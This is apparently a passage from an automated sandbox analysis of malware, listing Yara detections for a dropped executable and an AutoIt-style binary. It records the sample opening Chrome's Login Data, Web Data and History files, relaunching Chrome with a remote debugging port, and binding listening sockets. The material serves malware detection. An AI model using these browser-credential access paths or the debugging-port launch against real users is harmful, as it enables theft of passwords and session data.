Source: Yara match File source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.ugdKEDU.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.ugdKEDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 1548, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 2644, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: AchillesGuard.com Binary or memory string: WIN_81
Source: AchillesGuard.com Binary or memory string: WIN_XP
Source: AchillesGuard.com, 0000001C.00000002.3528429627.00000000009E3000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: AchillesGuard.com Binary or memory string: WIN_XPe
Source: AchillesGuard.com Binary or memory string: WIN_VISTA
Source: AchillesGuard.com Binary or memory string: WIN_7
Source: AchillesGuard.com Binary or memory string: WIN_8
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 2644, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match File source: 31.2.ugdKEDU.exe.3c19550.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.0.ugdKEDU.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000000.2957620541.0000000000892000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ugdKEDU[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe, type: DROPPED
Source: Yara match File source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.ugdKEDU.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.ugdKEDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 1548, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 2644, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009A2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 28_2_009A2263
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009A1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 28_2_009A1C61
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs